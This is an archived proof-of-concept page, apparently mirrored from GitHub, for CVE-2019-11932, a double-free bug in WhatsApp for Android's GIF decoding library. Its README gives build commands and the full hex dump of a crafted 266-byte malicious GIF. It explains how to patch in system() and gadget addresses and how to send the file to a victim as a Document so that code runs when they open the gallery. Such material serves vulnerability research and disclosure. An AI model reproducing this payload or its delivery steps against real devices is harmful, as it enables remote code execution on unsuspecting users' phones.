Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-11932 PoC — Facebook WhatsApp 资源管理错误漏洞

Source
https://github.com/awakened1712/CVE-2019-11932
Associated Vulnerability
Title:Facebook WhatsApp 资源管理错误漏洞 (CVE-2019-11932)
Description:Facebook WhatsApp是美国Facebook公司的一套利用网络传送短信的移动应用程序。该应用程序通过智能手机中的联络人信息,查找使用该软件的联络人传送文字、图片等。 基于Android平台的Facebook WhatsApp 2.19.244之前版本中的libpl_droidsonroids_gif 1.2.18之前版本的decoding.c文件的DDGifSlurp函数存在资源管理错误漏洞。远程攻击者可利用该漏洞执行任意代码或造成拒绝服务。
Description
Simple POC for exploiting WhatsApp double-free bug in DDGifSlurp in decoding.c in libpl_droidsonroids_gif
Readme
# CVE-2019-11932

The address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.

After replacing address of system() and gadget. Run the code to generate the corrupted GIF file:

```
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B
```

Then copy exploit.gif file and send it as Document with WhatsApp to another WhatsApp user. Take note that it must not be sent as a Media file, otherwise WhatsApp tries to convert it into an MP4 before sending. Upon the user receives the malicous GIF file, nothing will happen until the user open WhatsApp Gallery to send a media file to his/her friend.
File Snapshot

 [4.0K]  /data/pocs/f040d73eae41a95d60b595f227b9ff9ef3922914
├── [3.4K]  egif_lib.c
├── [5.6K]  exploit.c
├── [ 11K]  gif_lib.h
├── [  42]  Makefile
├── [4.0K]  MyApplication2
│   ├── [4.0K]  app
│   │   ├── [ 13K]  app.iml
│   │   ├── [1.3K]  build.gradle
│   │   ├── [ 636]  CMakeLists.txt
│   │   ├── [ 772]  proguard-rules.pro
│   │   └── [4.0K]  src
│   │       └── [4.0K]  main
│   │           ├── [ 902]  AndroidManifest.xml
│   │           ├── [4.0K]  assets
│   │           │   ├── [  97]  hang2.double-free.gif
│   │           │   ├── [ 266]  not_kitty.double-free.arm64.gif
│   │           │   ├── [ 212]  not_kitty.double-free.armv7.gif
│   │           │   ├── [2.6K]  not_kitty.mod.gif
│   │           │   └── [ 198]  not_kitty_orig.gif
│   │           ├── [4.0K]  cpp
│   │           │   └── [4.0K]  gif
│   │           │       ├── [3.4K]  egif_lib.c
│   │           │       ├── [ 14K]  exploit.c
│   │           │       └── [ 12K]  gif_lib.h
│   │           ├── [4.0K]  java
│   │           │   └── [4.0K]  com
│   │           │       └── [4.0K]  example
│   │           │           └── [4.0K]  myapplication
│   │           │               └── [4.6K]  MainActivity.java
│   │           └── [4.0K]  res
│   │               ├── [4.0K]  drawable
│   │               │   └── [5.6K]  ic_launcher_background.xml
│   │               ├── [4.0K]  drawable-v24
│   │               │   └── [1.9K]  ic_launcher_foreground.xml
│   │               ├── [4.0K]  layout
│   │               │   └── [ 813]  activity_main.xml
│   │               ├── [4.0K]  mipmap-anydpi-v26
│   │               │   ├── [ 276]  ic_launcher_round.xml
│   │               │   └── [ 276]  ic_launcher.xml
│   │               ├── [4.0K]  mipmap-hdpi
│   │               │   ├── [3.0K]  ic_launcher.png
│   │               │   └── [4.9K]  ic_launcher_round.png
│   │               ├── [4.0K]  mipmap-mdpi
│   │               │   ├── [2.0K]  ic_launcher.png
│   │               │   └── [2.8K]  ic_launcher_round.png
│   │               ├── [4.0K]  mipmap-xhdpi
│   │               │   ├── [4.5K]  ic_launcher.png
│   │               │   └── [6.9K]  ic_launcher_round.png
│   │               ├── [4.0K]  mipmap-xxhdpi
│   │               │   ├── [6.3K]  ic_launcher.png
│   │               │   └── [ 10K]  ic_launcher_round.png
│   │               ├── [4.0K]  mipmap-xxxhdpi
│   │               │   ├── [9.0K]  ic_launcher.png
│   │               │   └── [ 15K]  ic_launcher_round.png
│   │               └── [4.0K]  values
│   │                   ├── [ 214]  colors.xml
│   │                   ├── [  80]  strings.xml
│   │                   └── [ 394]  styles.xml
│   ├── [ 426]  build.gradle
│   ├── [4.0K]  gradle
│   │   └── [4.0K]  wrapper
│   │       ├── [ 53K]  gradle-wrapper.jar
│   │       └── [ 238]  gradle-wrapper.properties
│   ├── [ 739]  gradle.properties
│   ├── [5.2K]  gradlew
│   ├── [2.2K]  gradlew.bat
│   ├── [ 450]  local.properties
│   ├── [ 886]  MyApplication2.iml
│   └── [  16]  settings.gradle
└── [1.5K]  README.md

24 directories, 46 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.